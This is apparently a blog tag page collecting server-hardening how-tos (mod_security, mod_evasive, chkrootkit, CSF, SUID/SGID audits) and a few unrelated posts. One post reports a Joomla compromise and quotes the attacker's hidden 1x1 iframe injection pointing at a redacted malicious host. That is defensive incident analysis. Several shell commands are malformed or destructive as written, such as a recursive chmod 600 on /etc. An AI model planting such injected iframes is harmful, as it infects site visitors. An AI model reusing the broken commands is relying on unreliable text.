server

Server may refer to: read more at WikiPedia

  • FaF (File Anomaly Finder) is a wrapper for the *nix 'find' utility. It generates audit reports for data matching specific characteristics; such data as setgid/setuid, unowned, and more. The objectives are simply to create a simple anomaly finder that identifies common flawed permissions or otherwise suspicious file system characteristics.

    The main features of FaF are:
    • simplistic and to the point audit reports
    • easy setup and configuration
    • audits emailed to customizable address or user
    • ideal for web servers or general purpose workstations
    • audits of setgid/setuid, hidden, unowned, & world writable data
    • very portable
     http://www.r-fx.org/faf.php # wget http://www.r-fx.ca/downloads/faf-current.tar.gz
    # tar xvf  faf-current.tar.gz

    # cd faf*
    # ./install.sh

    Install path:     /usr/local/faf/
    Config path:     /usr/local/faf/conf.faf
    Executable path: /usr/local/sbin/faf


    Why do you need such tool?
    Never trust anyone, including sometimes yourself ;-) this tool correctly used just insured You that You will never forget any files with too much permissions. It may also reveal a hacker, putting some new files under the user nobody...

    What to do with the output?

    You'll have to react differently for each occurrence in the report....

    SUID/SGID Binaries

    Sticky bit was used on executables in linux (which was used more often) so that they would remain in the memory more time after the initial execution, hoping they would be needed in the near future. But since today we have more sophisticated memory accessing techniques and the bottleneck related to primary memory is diminishing, the sticky bit is not used today for this. Instead, it is used on folders, to imply that a file or folder created inside a sticky bit-enabled folder could only be deleted by the creator itself. A nice implementation of sticky bit is the /tmp folder,where every user has write permission but only users who own a file can delete them. Remember files inside a folder which has write permission can be deleted even if the file doesn't have write permission. The sticky bit comes useful here.

    SUID or SetUID bit, the executable which has the SUID set runs with the ownership of the program owner. That is, if you own an executable, and another person issues the executable, then it runs with your permission and not his. The default is that a program runs with the ownership of the person executing the binary.

    Consider also reading:
    What are the SUID, SGID and the Sticky Bits?

    You can find them also manually by entering:
    # find / -type f \( -perm -04000 -o -perm -02000 \;
    The SGID bit is the same as of SUID, only the case is that it runs with the permission of the group. Another use is it can be set on folders,making nay files or folders created inside the SGID set folder to have a common group ownership.

    files in/srv  (http root folder)
       You should accept NO files with SUID/SGID in http root folder. Remove them all 
            # find /srv -type f \( -perm -04000 -o -perm -02000 \) -exec  chmod \;

    No Owner/Group
    May also be an indication an intruder has accessed your system...
    Can also be found manually by typing:
    # find / \( -nouser -o -nogroup \) -print
    files in/srv (http root folder)

    Permissions and ownership are linked together to make your server work peacefully. The basic idea is always to give the minimum rights to the file.

    A rule for thumbs would be:
    read only for all file, r--r--r-- or r---------
    read, execute for all directory r-xr-xr-xor r-x------
    The problem is that apache and PHP also run under their own user...

    A very informative article explaining the problem on a concrete example (Gallery2) can be found at  http://codex.gallery2.org/Gallery2:Security

    At least (worst),when apache run as wwwrun user in www group, in your HTTP directory
    # chown -R wwwrun .
    # chgrp  -R www .
    then all files has to be  rw- --- --- and directory r-x------
    Advantages:you can use Joomla! administrator panel
    BUT: any bug in PHP code, attack can read or overwrite any files! -> highly insecure

    Better would be for all files/dir in your HTTP directory to changes accordingly to the right web user!
    # chown -R cedric .
    # chgrp  -R psacln  .
    Change all files/directories that has to be written  by apache (cache directories) to
    # chown -R wwwrun cache
    # chgrp  -R www cache
    Advantages: a bug in apache/php, or attack can not touch any of your files.
    BUt: if PHP do not run under your user, the Joomla! panel wont be usable, as Apache/PHP wont be able to install any new components/images.

    Files in /must generally only be available to root
    # chown -R root /etc
    #chgrp  -R root /etc
    # find /etc -f -exec chmod 600 {} /;

    World Writable

    files in/srv
    must be avoid at any costs! This line remove the world writable bit to  all files in /srv
    # find /srv -f -exec chmod o-w {} /;
    This line remove the world writable bit to  all directories in /srv
    # find /srv -d -exec chmod o-w {} /;
    Files in /
    You should ignores /proc files, /dev files (hundreds of these are correctly world writable),
    Symbolic (soft) links (which should have mode 777), directories with the sticky (save text) bit on, and
    sockets, as that is relatively safe.
    Hidden Files/Paths

    You should normally have no such files! try to understand why (look in google), open them and/or move/delete them
  • This are my mod_evasive settings:
     
    LoadModule evasive20_module     /usr/lib/apache2/mod_evasive20.so
    <IfModule mod_evasive20.c>
      DOSHashTableSize 3097
      DOSPageCount 5
      DOSSiteCount 100
      DOSPageInterval 2
      DOSSiteInterval 2
      DOSBlockingPeriod 600
      DOSEmailNotify This email address is being protected from spambots. You need JavaScript enabled to view it.
    </IfModule>

    And this is a small documentation I've forget to add in the previous article:

    • DOSHashTableSize: is the size of the table of URL and IP combined. The greater this setting, the more memory is required for the look up table, but also the faster the look ups are processed. This option will automatically round up to the nearest prime number.
    • DOSPageCount: is the number of same page requests from the same IP during an interval that will cause that IP to be added to the block list.
    • DOSSiteCount: is the number of pages requested of a site by the same IP during an interval which will cause the IP to be added to the block list.
    • DOSPageInterval:  Interval for the 'DOSPageCount' threshold in second intervals.
    • DOSSiteInterval:Interval for the 'DOSSiteCount' threshold in second intervals.
    • DOSBlockingPeriod: is the time the IP is blacked (in seconds
    • DOSEmailNotify: can be used to notify by sending an email everytime an IP is blocked
    • DOSSystemCommand: is the command used to execute a command when an IP is blocked. It can be used to add a block the user from a firewall or router.
    • DOSWhiteList: can be used to whitelist IPs such as 127.0.0.1
    So if anybody on my homepage request 5 times the same page in less than 2 seconds, it will get blacklisted.
    If anybody try to make more than 100 requests of my homepage in less than 2 seconds, it will get blacklisted.  
        
    In less than a week, the following Bots get blacklisted.

    84.80.211.6      Unknown Country
    62.226.126.102   Germany
    202.64.146.221   Chinese (Hong Kong)
    88.152.174.86    Unknown Country
    84.30.174.179    Dutch (Netherlands)
    84.154.17.72      GERMANY (DE) City: Muenchen Latitude: 48.15 Longitude: 11.5833
    70.225.166.33    United States
    202.63.102.211   Country: INDIA (IN) City: Hyderabad Latitude: 17.3833 Longitude: 78.4833
    69.148.83.2      UNITED STATES (US)
    195.38.6.181      Swedish (Sweden)
    81.242.199.145   BELGIUM (BE) City: Tournai Latitude: 50.6 Longitude: 3.3833
    217.120.138.11   NETHERLANDS (NL) City: Harlingen Latitude: 53.1833 Longitude: 5.4167
    195.145.98.50    GERMANY (DE) City: Heinsberg Latitude: 51.0333 Longitude: 8.15
    195.4.181.237    GERMANY (DE)
    80.166.87.34      DENMARK (DK)
    84.87.167.10      Dutch (Netherlands)
    81.208.83.238    ITALY (IT) City: Roma  Latitude: 41.9 Longitude: 12.4833
    66.249.66.199    UNITED STATES (US) City: Mountain View, CA Latitude: 37.402 Longitude: -122.078 GOOGLE
    84.137.16.79      GERMANY (DE)
    86.83.255.147    Dutch (Netherlands)
    66.249.65.99     UNITED STATES (US) City: Raleigh, NC Latitude: 35.8219 Longitude: -78.6588

     
     
  • ModSecurityTM is an open source intrusion detection and prevention engine for web applications (or a web application firewall). Operating as an Apache Web server module or standalone, the purpose of ModSecurity is to increase web application security, protecting web applications from known and unknown attacks.from http://www.modsecurity.org/
     
    Installing mod_security as DSO is easier, and the procedure is the same for both Apache branches. First unpack the distribution somewhere (anywhere will do, I copy the .c files in my home),

    # cd
    # wget http://www.modsecurity.org/download/mod_security-1.9.4.tar.gz
    # tar -zxfv mod_security-1.9.4.tar.gz
    # cd mod_security-1.9.4/apache2

    and compile the module with:

    apache1apache2
    /usr/local/psa/admin/bin/apxs  -cia ~/mod_security.c/usr/sbin/apxs2  -cia ~/mod_security.c

    First problem that may occur is the absence of
    • GccThe GNU Compiler Collection (usually shortened to GCC) is a set of programming language compilers produced by the GNU Project. It is free software distributed by the Free Software Foundation (FSF) under the GNU GPL, and is a key component of the GNU toolchain. It is the standard compiler for the open source Unix-like operating systems, and certain proprietary operating systems derived therefrom such as Mac OS X. [WikiPedia]
    • apache-dev: contains the apxs tool, and required pache heder to compile a module
    Both can be installed via YaST2...

    Tips: if your apxs2 is not located at /usr/bin/apxs2, you can search it by typing # find / -name apxs2

    # /usr/sbin/apxs2  -cia ~/mod_security.c
    /usr/share/apache2/build/libtool --silent --mode=compile gcc -prefer-pic -O2 -march=i586 -mcpu=i686 -fmessage-length=0 -Wall -g -fPIC -Wall -fno-strict-aliasing -D_LARGEFILE_SOURCE -DAP_HAVE_DESIGNATED_INITIALIZER -DLINUX=2 -D_REENTRANT -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE -D_GNU_SOURCE -DAP_DEBUG -Wmissing-prototypes -Wstrict-prototypes -Wmissing-declarations -pthread -I/usr/include/apache2  -I/usr/include/apache2   -I/usr/include/apache2   -c -o /root/mod_security.lo /root/mod_security.c && touch /root/mod_security.slo
    /usr/share/apache2/build/libtool --silent --mode=link gcc -o /root/mod_security.la  -rpath /usr/lib/apache2 -module -avoid-version    /root/mod_security.lo
    /usr/share/apache2/build/instdso.sh SH_LIBTOOL='/usr/share/apache2/build/libtool' /root/mod_security.la /usr/lib/apache2
    /usr/share/apache2/build/libtool --mode=install cp /root/mod_security.la /usr/lib/apache2/
    cp /root/.libs/mod_security.so /usr/lib/apache2/mod_security.so
    cp /root/.libs/mod_security.lai /usr/lib/apache2/mod_security.la
    cp /root/.libs/mod_security.a /usr/lib/apache2/mod_security.a
    ranlib /usr/lib/apache2/mod_security.a
    chmod 644 /usr/lib/apache2/mod_security.a
    PATH="$PATH:/sbin" ldconfig -n /usr/lib/apache2
    ----------------------------------------------------------------------
    Libraries have been installed in:
       /usr/lib/apache2

    If you ever happen to want to link against installed libraries
    in a given directory, LIBDIR, you must either use libtool, and
    specify the full pathname of the library, or use the `-LLIBDIR'
    flag during linking and do at least one of the following:
       - add LIBDIR to the `LD_LIBRARY_PATH' environment variable
         during execution
       - add LIBDIR to the `LD_RUN_PATH' environment variable
         during linking
       - use the `-Wl,--rpath -Wl,LIBDIR' linker flag
       - have your system administrator add LIBDIR to `/etc/ld.so.conf'

    See any operating system documentation about shared libraries for
    more information, such as the ld(1) and ld.so(8) manual pages.
    ----------------------------------------------------------------------
    chmod 755 /usr/lib/apache2/mod_security.so
    apxs:Error: Config file /etc/apache2/httpd2-prefork.conf not found.

    Do not take care of the error in blue, since the resulting shared library (mod_security.so) has been automatically copied into /usr/lib/apache2

    Copy then the desired rule set (modsecurity-general.confor modsecurity-php.conf) into /etc/apache2

    Edit /etc/apache2/httpd.confand add the following lines at the end of file, it is also recommended to use the rules from www.GotRoot.com

    LoadModule security_module /usr/lib/apache2/mod_security.so
    SecFilterEngine On
    Include /etc/apache2/modsecurity_rules/modsecurity-general.conf
    Include /etc/apache2/modsecurity_rules/modsecurity-hardening.conf

    rules set found at http://www.gotroot.com/tiki-index.php?page=mod_security+rules
    Include /etc/apache2/modsecurity_rules/gotroot/apache2-rules.conf
    Include /etc/apache2/modsecurity_rules/gotroot/badips.conf
    Include /etc/apache2/modsecurity_rules/gotroot/blacklist2.conf
    Include /etc/apache2/modsecurity_rules/gotroot/blacklist.conf
    Include /etc/apache2/modsecurity_rules/gotroot/exclude.conf
    Include /etc/apache2/modsecurity_rules/gotroot/jitp.conf
    Include /etc/apache2/modsecurity_rules/gotroot/proxy.conf
    Include /etc/apache2/modsecurity_rules/gotroot/recons.conf
    Include /etc/apache2/modsecurity_rules/gotroot/rootkits.conf
    Include /etc/apache2/modsecurity_rules/gotroot/rules.conf
    Include /etc/apache2/modsecurity_rules/gotroot/useragents.conf

    BUT be carefull with modsecurity-hardening.conf
    1. This fle has to be tuned  for your server: logs files location, advanced rulesets, read carfeully and uncomment TODO if needed
    2. As default mod_security is in learning mode: it log and let the request  pass through (line SecFilterDefaultAction "pass, log"), recommended as soon as You have a good rulesets SecFilterDefaultAction "deny,log,status:500"
     Restart Apache2 by typing
    # /etc/init.d/apache2 restart

    Now it is time to check if mod_security is running       

    # tail -f /var/log/apache2/error_log
    [Mon Aug 21 18:43:38 2006] [notice] Apache/2.0.53 (Linux/SUSE) configured -- resuming normal operations
    [Mon Aug 21 19:01:56 2006] [notice] caught SIGTERM, shutting down
    [Mon Aug 21 19:01:57 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `h790663.serverkompetenz.net' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
    [Mon Aug 21 19:01:57 2006] [notice] mod_security/1.9.4 configured
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `h790663.serverkompetenz.net' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
    [Mon Aug 21 19:01:57 2006] [notice] Apache/2.0.53 (Linux/SUSE) configured -- resuming normal operations

    links
  • synology_nas4

    If you want more control, want to install Joomla yourself or want to install any other CMS, you may also want to try this method. It require some basic knowledge about SSH / file transfer through.

    Main differences compare to the other method

    • You won’t have any icons into the packages manager,
    • You wont be able to stop this services,
    • More prone to errors

    How to Install

    In the Control Panel of your Synology DSM NAS, go to “Web Services” and activate

    • Enable Web Station
    • Enable MySQL

    Use a Terminal to connect to your NAS, preferably as admin, using Winscp under windows for example.

    Move to the directory

    /volume1/web

    Upload all your Joomla files into a new directory, for example in

    /volume1/web/joomla

    Point your browser to http://{youservernasname}/joomla/ and finish the installation of Joomla.

  • Â

    Work in progress

  • Stop waiting for build & deploy make code changes. Write code and refresh your browser!

    Use DCEVM and add java fields, methods, classes and use them without restarting your application server, it's a modification of the HotSpot VM that allows unlimited class redefinition at run-time. You can add/remove fields and methods and change the super types of a class at run-time. The features of DCEVM are likely to be integrated in a future update of Java 8 as part of JEP 159.

    View code changes instantly and increases team velocity!

              DCEVM                  JVM Hot Swap         
    Changes to method bodies  yes yes
    Adding/removing Methods  yes  no
    Adding/removing constructors  yes  no
    Adding/removing fields  yes  no
    Adding/removing classes  yes  no
    Adding/removing annotations  yes  no
    Changing static field value  yes  no
    Adding/removing enum values  yes  no
    Modifying interfaces  yes  no
    Replacing superclass  yes  no
    Adding/removing implemented interfaces  no  no
    Initializes new instance fields  yes  no

     

  • I am BACK

    Please try to be patient, My homepage will encounter some instabilities till the end of the week end....

    • I have remove XANEON -> so URL rewriting and SEO is switched off, will try to solve this issue (mod_rewrite not active on server)
    • The new gallery is online, expect major upload of images soon

    New version of my components will soon be deployed to Joomla, in between you can enjoy pictures of boxes below:

    box security imagesbox joomlacloud
    box security imagesbox log4php

  • A lot of people have tried numerous times to download files from my download section without
    success, the error message was always the same

    Unrecoverable error "PCLZIP_ERR_BAD_FORMAT (-10)"

    Also, Some tried to unpack the zip file locally using stuffit/Winrar/7Zip and get an error suggesting
    that the archive is damaged.

    Only Internet Explorer users were having issues, this is because of Internet explorer not able to handle
    compression of all file types. I solved the issue by changing my mod_deflate.conf which now look like the following:

    <Location />
    AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css application/x-javascript

    # Make sure proxies don't deliver the wrong content
    Header append Vary User-Agent env=!dont-vary
    </Location>

    I found that I had to use application/x-javascript instead of application/javascript to actually get javascript files on my
    server to be served compressed.

    mod deflate documentation: http://httpd.apache.org/docs/2.0/mod/mod_deflate.html

  • chkrootkit is a tool to locally check for signs of a rootkit. chkrootkit is a common unix-based program intended to help system administrators check their system for known rootkits. It works by using several mechanisms, including comparison of file signatures to known rootkits, checking for suspicious activity (processes listed in the proc filesystem but not in the output of the 'ps' command.
    Log to the server with ssh as root user

    Download 
    chkrootkit.
    # wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

    Unpack the chkrootkit you just downloaded.
    # tar xvzf chkrootkit.tar.gz

    go to that  directory
    # cd chkrootkit

    Compile
    # make sense

    Run
    # chkrootkit

     
    •Receive e-mail everyday with the result chkrootkit
    For Root user
    # crontab -e
    For any user
    # crontab -e -u username

    and add

    •0 3 * * * (./usr/sbin/chkrootkit 2>&1 | mail -s "chkrootkit output" -c This email address is being protected from spambots. You need JavaScript enabled to view it.,This email address is being protected from spambots. You need JavaScript enabled to view it. This email address is being protected from spambots. You need JavaScript enabled to view it.)

    * the correct path can be found with which chkrootkit
    This will run chkrootkit at 3:00 am every day, and e-mail the output to This email address is being protected from spambots. You need JavaScript enabled to view it. and copies to This email address is being protected from spambots. You need JavaScript enabled to view it. and This email address is being protected from spambots. You need JavaScript enabled to view it.

    False alarms:
     "Checking `bindshell'... INFECTED (PORTS: 465)" This is normal and  NOT really a rootkit.

    Nota
    If you ever get a positive alarm, you can try to remove the rootkit, but all professionals would advice you to reinstall the server from scratch, and restore a previous backup (that mean saving nothing from server as soon as the rootkit is revealed....)

    Links
    chkrootkit
  • CSF: A Stateful Packet Inspection (SPI) firewall, Login/Intrusion Detection and Security application for Linux servers. It easily replace APF and (Advanced policy firewall) and BFD (Brute Force Detection). It is also runing 28 basics but non obvious checks...

     CSF has a loot of functionnalities and has 2 nice features. It can block trafic from well known spammers network
    using the DShield Block List and the Spamhaus DROP List.
    It easily replace APF and (Advanced policy firewall) and BFD (Brute Force Detection).

    • Straight-forward SPI iptables firewall script
    • Daemon process that checks for login authentication failures for:
      • courier imap and pop3
      • ssh
      • non-ssl cpanel / whm / webmail (cPanel servers only)
      • pure-pftd
      • password protected web pages (htpasswd)
      • mod_security failures
    • POP3/IMAP login tracking to enforce logins per hour
    • SSH login notification
    • SU login notification
    • Excessive connection blocking
    • WHM configuration interface (cPanel servers only) or through Webmin
    • WHM iptables report log (cPanel servers only)
    • Easy upgrade between versions from within WHM (cPanel servers only) or through Webmin
    • Easy upgrade between versions from shell
    • A standard Webmin Module to configure csf is included in the distribution ready to install into Webmin - csfwebmin.tgz
    • Pre-configured to work on a cPanel server with all the standard cPanel ports open (cPanel servers only)
    • Auto-configures the SSH port if it's non-standard on installation
    • Block traffic on unused server IP addresses - helps reduce the risk to your server
    • Alert when end-user scripts sending excessive emails per hour - for identifying spamming scripts
    • Suspicious process reporting - reports potential exploits running on the server
    • Excessive user processes reporting
    • Excessive user process usage reporting and optional termination
    • Suspicious file reporting - reports potential exploit files in /tmp and similar directories
    • Directory and file watching - reports if a watched directory or a file changes
    • Block traffic on the DShield Block List and the Spamhaus DROP List
    • Pre-configured settings for Low, Medium or High firewall security (cPanel servers only)
    • Works with multiple ethernet devices
    • Server Security Check - Performs a basic security and settings check on the server (cPanel servers only)
    • Allow Dynamic DNS IP addresses - always allow your IP address even if it changes whenever you connect to the internet
    • Alert sent if server load average remains high for a specified length of time
    • mod_security log reporting (if installed)
    • Email relay tracking - tracks all email sent through the server and issues alerts for excessive usage (cPanel servers only)
    • IDS (Intrusion Detection System) - the last line of detection alerts you to changes to system and application binaries

    Installation is straightforward:

    # wget http://www.configserver.com/free/csf.tgz
    # tar xvf csf.tgz
    # cd csf
    # ./install.sh

    Note all ports that are displayed after the installation, these are port running already on your system (UDP, TCP in and out)
    review the config file by editing:

    # vi /etc/csf/csf.conf

    and add at least the port written before (if you trsut your system before install ;-))
    Do not allow incoming connection or outgoing connections to mysql port (use ssh localforwarding), ftp (use scp)
    As default the rules are only working 5 minutes then get erased. This is the learnig mode, you cant break anything. Just continue reading the file csf.conf It contains a lot of interesting informations...
  • This article shows how you can convert a physical Windows system (XP, 2003, 2000, NT4 SP4+) into a VMware virtual machine with the free VMware Converter Starter. The resulting virtual machine can be run in the free VMware Player and VMware Server, and also in VMware Workstation and other VMware products. Vmware Converter comes in handy if you want to switch to a Linux desktop, but feel the need to run your old Windows desktop from time to time. By converting your Windows desktop into a virtual machine, you can run it under VMware Server/Player, etc. on your Linux desktop.

    I Will try that this week end!

  • spektrumDX5e

    Spektrum introduces another enormous change for the RC industry—The most affordable full-range 2.4GHz radio ever available. The DX5e brings together the unbeatable control of genuine DSM2 technology with the simplest, easiest-to-use design available, letting anyone, from park fliers to students to instructors and more, take advantage of Spektrum technology for less

    Mode 2 is most often used in the United States, while Mode 1 is most often used in Europe, there are two other modes that are used overseas and here is a listing of the 4 modes and their actions.

     

      Left stick Right stick
    up/down left/right up/down left/right
    Mode 1 elevator rudder throttle aileron
    Mode 2 throttle rudder elevator aileron
    Mode 3 elevator aileron throttle rudder
    Mode 4 throttle aileron elevator rudder
  • synology_nas_less_noise

    After some years of use, you’ll notice the increase noise coming from the cooling system. Any ventilator on the market, even the more expensive, or the more silent will wear off and start making noise. Replacing the ventilator is done in less than 2 minutes if you follow this little how to.

    Choosing the right ventilator

    • Don’t pay too much, better choose a cheap model and replace it every year or two
    • Below 19 dB, it is difficult to hear a ventilator running, don’t go over 22dB noise
    • You need a 80mm x 80mm x 25mm it is a standard size, you cant go wrong in a shop (other common size are 92mm and 120mm)
    • Check that the connector is a 3 pin Molex.
    • It need to run on 12volts, the lower the voltage, the lower the noise, but too low and the NAS may overheat since the air flow is also reduced.

    I paid this Xilence case fan 8 euros, sold as being silent 15dB, 1500 rpm, 18.67 CFM, not running below 7V.

    You can safely choose any brand:  Papst, Be quiet!, Revoltec, Zalman, Noctua, Noiseblocker, all of these are good if they meet the above requirement, unfortunately the were not available in my favorite shop (www.digitec.ch)

    synology_nas_less_noise_01

    Open the back side of your Synology NAS, remove the old case fan and replace by the new one, it is so simple.

    synology_nas_less_noise_002

    The old one and the new one side by side

    synology_nas_less_noise_03

    Everything is in place

    synology_nas_less_noise_04

    You can now enjoy your Synology NAS, the silence is back!

  • 2 weeks ago, a post on Google&39;s official blog announced a project that allows users to step inside the private world of its data centers. For the first time, the company&39;s impressive efficiency records and green ethos have been given a face in the form of the stunning photographs by Connie Zhou and the Street View-able hallways of the Lenoir facility in North Carolina...

    GoogleDataCenters

    http://www.google.com/about/datacenters/gallery/#/

  •  Everything has started with an email

    Trojan-Downloader.VBS.Agent&8206;
    From: Enrique MONTECRISTO (This email address is being protected from spambots. You need JavaScript enabled to view it.)
    Sent: Mon 6/18/07 10:04 PM
    To: This email address is being protected from spambots. You need JavaScript enabled to view it.
       
    Hello Cedric,
    When I browse your website with Firefox, I get this kind of warning from my GDATA antivirus shield :
    http://www.gdata.de/trade/GB/productview/727/16
    ---------------------------
    Virus: Trojan-Downloader.VBS.Agent.u
    Adress: stat1count.net
    ----------------------------
    Virus: Trojan-Downloader.JS.Agent.fq
    Address: stat1count.net
    ----------------------------
    Is it a fake ?

    The "virus" Trojan-Downloader.JS. seems like a malicious javascript inline somewhere in my homepage
    Thanks to Firefox WebDeveloper toolbar, it was quite easy to locate the malicious script (View all javascript)

    The Hacker was inserting 2 strange line in my content. He has tampered:


    index.php
    // displays queries performed for page
    if ($mosConfig_debug) {
        echo $database->_ticker . ' queries executed';
        echo '<pre>';
        foreach ($database->_log as $k=>$sql) {
            echo $k+1 . "\n" . $sql . '<hr />';
        }
        echo '</pre>';
    }
    doGzip();
    ?>

    <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxx.info/stds/go.php?sid=3'></iframe>

    AND /index2.php

    <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
                <?php echo $mainframe->getHead(); ?>
                <link rel="stylesheet" href="templates/<?php echo $cur_template;?>/css/template_css.css" type="text/css" />
                <link rel="shortcut icon" href="<?php echo $mosConfig_live_site; ?>/images/favicon.ico" />
                <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
                <meta name="robots" content="noindex, nofollow" />
                <?php if ($my->id || $mainframe->get( 'joomlaJavascript' )) { ?>
                <script language="JavaScript" src="<?php echo $mosConfig_live_site;?>/includes/js/joomla.javascript.js" type="text/javascript"></script>
                <?php } ?>
            </head>
            <body class="contentpane">
               <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxxx.info/stds/go.php?sid=3'></iframe>
                <?php mosMainBody(); ?>
            </body>
        </html>
        <?php


    Which got replace at runtime with
    http://xxx.info/stds/pages/default.php
    http://xxxxxxx.info/c/2380/counter21.php    

    xxxxx.info  I dont want to make publicity to this hacker by publishing his server url here

    How to find all place potentialy infected?

    return a list of all files with path (-H) that contains the substring xxxxx

    # find . -type f  -exec grep -H xxxxx {} \;

    How did I get infected?

    It seems that the hacker has use my demo site at demo.waltercedric.com to copy an image on the server or replace an existing one which was having bad user rights
    It may be an image like this one runme.php.jpg  this image then bootstrap and load a hacker tool c99shell (also known as PHP/C99Shell.A or Backdoor.PHP.C99Shell.c)

    PHP/C99Shell-A is a backdoor Trojan for platforms with PHP support, such as web servers. PHP/C99Shell-A listens for commands from a remote user.

    How to avoid that next time

    No file in apache root must have more than r--r--r-- rights so here is a small scripts that you can crontab or save for periodically check. It automatically change all files to read only for all, group and other

    # find . -type f -perm 600 -exec chmod ago=r {} \;


    Joomla! is automating during file save the CHMOD, but not on all files in the structure.

    Avoid any files with setguid in your apache root
    # find . -type f -perm 600 -exec chmod ago=r {} \;

    Note:


  • ModSecurityTM is an open source intrusion detection and prevention engine for web applications (or a web application firewall). Operating as an Apache Web server module or standalone, the purpose of ModSecurity is to increase web application security, protecting web applications from known and unknown attacks. from http://www.modsecurity.org/

    You'll have to create a free account at https://bsn.breach.com to get the real link

    # cd
    # wget https://bsn.breach.com/downloads/t=5156aa8803d6f186cf38688be522a402/modsecurity-apache/modsecurity-apache_2.5.7.tar.gz
    # tar -zxfv modsecurity-apache_2.5.7.tar.gz
    # cd modsecurity-apache_2.5.7/apache2
    # ./configure
    # make

    Copy the library mod_security2.so to /usr/lib/apache2&160;

    # cp /root/modsecurity-apache_2.5.7/apache2/.libs/mod_security2.so /usr/lib/apache2/mod_security2.so&160;&160;

    Then copy all latest rules into apache2/conf.d folder

    # cp -r /root/modsecurity-apache_2.5.7/rules/etc/apache2/conf.d/

    Copy the minimal configuration file into apache2/conf.d folder

    # cp /root/modsecurity-apache_2.5.7/modsecurity.conf-minimal /etc/apache2/conf.d/modsecurity2.conf

    Add this line at the top of modsecurity2.conf

    LoadModule security2_module /usr/lib/apache2/mod_security2.so

    Restart apache2 by executing

    # rcapache2 restart

    Verify proper operations by looking at log files

    # tail -f /var/log/apache2/modsec_debug_log

    Attention this is my location for log files!

    Change

    • audit log location line 191
    • debug log location line 285

    in /etc/apache2/conf.d/rules/modsecurity_crs_10_config.conf

  • checklist

    An exploited or hacked server is one that is no longer fully under your control and someone else is now partially using your server for their own purposes.

    You’ll find in this mind map

    What bad guys can do and remedies

    Why a mind map?

    A mind map is a diagram used to visually outline information. mind map help you take notes, brainstorm complex problems, and think creatively.

    • Information are summarized efficiently to be usable and accessible,
    • Inter-relationships are clear between the different concepts,
    • It is the most flexible for organizing associative, divergent and convergent thinking (Convergent thinking involves aiming for a single, correct solution to a problem, whereas divergent thinking involves creative generation of multiple answers to a set problem),

    You can find the latest version at

    http://linux-compromised-server-checks.waltercedric.com/

  • First let's refresh some definitions...
    set user ID (SUID)

    The SUID permission causes a script to run as the user who is the owner of the script, rather than the user who started it. It is normally considered extremely bad practice to run a program in this way as it can pose many security problems.

    set group ID (SGID)

    The SGID permission causes a script to run with its group set to the group of the script, rather than the group of the user who started it. It is normally considered extremely bad practice to run a program in this way as it can pose many security problems.

    Latest versions of the Linux kernel will even prohibit the running of shell scripts that have SGID/SUID attribute set.

    Use of the SUID bit on binaries (to run with root privileges, aka &8221;setuid bit&8221;) MUST be limited to those shown in
    the following list:

    /bin/ping
    /bin/su
    /usr/bin/at
    /usr/bin/chage
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/crontab
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/passwd


    The other binaries that were installed with the SUID bit set MUST have this bit removed. Administrators can still run
    these binaries normally, but they are not available for ordinary users. There are also a number of SGID files on the system that are needed, it may depending on the number of tools, or your distribution. Use Google and query the web for the right list ;-)

    Similarly, the SGID bit MUST NOT be used to give group &8221;root&8221; privileges to any binary.
    To generate a list of all SUID/SGID programs on the system simply run the following command:

    # find / -not -fstype ext3 -prune -o \ -type f \( -perm -4000 -o -perm -2000 \) \ -print


    Then, for each file in this list that is not one of the permitted SUID or SGID programs, run the command
    # chmod -s FILE

    to remove the SUID and SGID bits. When done, re-run the find command to verify that the list matches the
    permitted programs.

    I recommend you installing also FAF (File Anomaly Finder) on your server to check periodically for file with too much rights or privileges

  • mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.

    Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
    • Requesting the same page more than a few times per second
    • Making more than 50 concurrent requests on the same child per second
    • Making any requests while temporarily blacklisted (on a blocking list)

    This method has worked well in both single-server script attacks as well as distributed attacks, but just like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it's a good idea to integrate this with your firewalls and routers for maximum protection.

    This module instantiates for each listener individually, and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on 'reload' should not be affected unless they do it maliciously. mod_evasive is fully tweakable through the Apache configuration file, easy to incorporate into your web server, and easy to use. from  http://www.zdziarski.com/projects/mod_evasive/

    click read more for my HowTo

     
     Download the actual version of mod_evasive
    #  wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz

    Unpack it
    #  tar xvzf mod_evasive_1.10.1.tar.gz/usr/local/src/mod_evasive

    Move to that directory
    #  cd /usr/local/src/mod_evasive
    And edit the file mod_evasive20.c, we will have to change the line 45 to
    define MAILER  "/bin/mail -t %s"

    We compile the module:
    Apache2Apache2-Prefork
    #  /usr/sbin/apxs2 -cia mod_evasive20.c#  /usr/sbin/apxs2-prefork -cia mod_evasive20.c

    Now we have to create a config file for mod_evasive:
    # touch /etc/apache2/conf.d/mod_evasive.conf
    and edit it
    # vi /etc/apache2/conf.d/mod_evasive.conf
    content of file

    Apache2Apache2-Prefork
    LoadModule evasive20_module     /usr/lib/apache2/mod_evasive20.so
